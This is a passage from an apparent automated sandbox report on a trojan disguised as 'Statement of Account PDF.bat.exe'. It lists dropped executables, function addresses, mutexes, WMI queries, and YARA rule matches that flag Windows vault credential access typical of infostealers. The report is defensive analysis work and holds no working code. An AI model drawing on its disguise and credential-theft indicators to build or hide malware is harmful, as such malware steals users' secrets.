                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A19C1510_2_06A19C15
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D37A2010_2_06D37A20
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D39BC010_2_06D39BC0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3C90010_2_06D3C900
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3BED010_2_06D3BED0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3AA6010_2_06D3AA60
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3BC8810_2_06D3BC88
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3D8A810_2_06D3D8A8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3004010_2_06D30040
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3000710_2_06D30007
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D3F14810_2_06D3F148
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06EDAE6810_2_06EDAE68
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED34D810_2_06ED34D8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED2C6810_2_06ED2C68
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED545810_2_06ED5458
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED309110_2_06ED3091
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED712010_2_06ED7120
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED391010_2_06ED3910
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_014041F815_2_014041F8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_0140EB0815_2_0140EB08
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_01404AC815_2_01404AC8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_01403EB015_2_01403EB0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_0140ADF815_2_0140ADF8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4343815_2_06B43438
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B465D015_2_06B465D0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4557015_2_06B45570
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B47D5015_2_06B47D50
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4B1F015_2_06B4B1F0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4C14015_2_06B4C140
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4767015_2_06B47670
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B45CB715_2_06B45CB7
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4E36815_2_06B4E368
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_06B4004015_2_06B40040
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_051026B818_2_051026B8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_05101FB818_2_05101FB8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_051001A018_2_051001A0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_05100B5018_2_05100B50
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_05100B6018_2_05100B60
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07408D1018_2_07408D10
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740CC1818_2_0740CC18
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07409BC018_2_07409BC0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07407A2018_2_07407A20
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740C90018_2_0740C900
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740877018_2_07408770
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07406F1018_2_07406F10
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740BED018_2_0740BED0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740BC8818_2_0740BC88
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740AA6018_2_0740AA60
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_074082A818_2_074082A8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740F14818_2_0740F148
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740B91818_2_0740B918
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740004018_2_07400040
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740000618_2_07400006
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0740D8A818_2_0740D8A8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764AD6818_2_0764AD68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07642C6818_2_07642C68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764545818_2_07645458
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_076434D818_2_076434D8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764712018_2_07647120
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764391018_2_07643910
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764309118_2_07643091
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0164E9E822_2_0164E9E8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_01644AC822_2_01644AC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0164ACC822_2_0164ACC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_01643EB022_2_01643EB0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_016441F822_2_016441F8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07041DC222_2_07041DC2
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07041DC822_2_07041DC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707556822_2_07075568
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_070765C822_2_070765C8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707C13822_2_0707C138
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707B1E822_2_0707B1E8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707303022_2_07073030
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07077D4822_2_07077D48
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707766822_2_07077668
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707E36022_2_0707E360
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707004022_2_07070040
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07075CAF22_2_07075CAF
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707000622_2_07070006
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_04FC180825_2_04FC1808
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_04FC17F825_2_04FC17F8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A68825_2_06E8A688
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E89CC825_2_06E89CC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E86CD825_2_06E86CD8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E839C025_2_06E839C0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A67C25_2_06E8A67C
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8728025_2_06E87280
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8727125_2_06E87271
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A3E025_2_06E8A3E0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A3F025_2_06E8A3F0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8C38825_2_06E8C388
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8C37825_2_06E8C378
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E89CB825_2_06E89CB8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF34D825_2_06FF34D8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF2C6825_2_06FF2C68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF545825_2_06FF5458
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FFAD6825_2_06FFAD68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF309125_2_06FF3091
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF712025_2_06FF7120
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF391025_2_06FF3910
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AC90025_2_071AC900
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A9BC025_2_071A9BC0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A7A2025_2_071A7A20
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AF14825_2_071AF148
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A001625_2_071A0016
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A004025_2_071A0040
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AAA6025_2_071AAA60
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071ABC8825_2_071ABC88
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AD8A825_2_071AD8A8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071ABED025_2_071ABED0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0739C55025_2_0739C550
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0739E6F025_2_0739E6F0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816
                      Source: Statement of Account PDF.bat.exeBinary or memory string: OriginalFilename vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.000000000459D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000000.1626756757.0000000000580000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUbK.exe& vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1709155218.0000000007288000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUbK.exe& vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1699276440.0000000002A5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1694061767.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4071828324.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exeBinary or memory string: OriginalFilenameUbK.exe& vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Statement of Account PDF.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: gDdsxauPhk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, rX6SQY6VW0eXSFLNTj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@36/32@2/2
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8032
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: \Sessions\1\BaseNamedObjects\JATJfqjfmxt
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7400
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_03
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp690.tmpJump to behavior
                      Source: Statement of Account PDF.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Statement of Account PDF.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
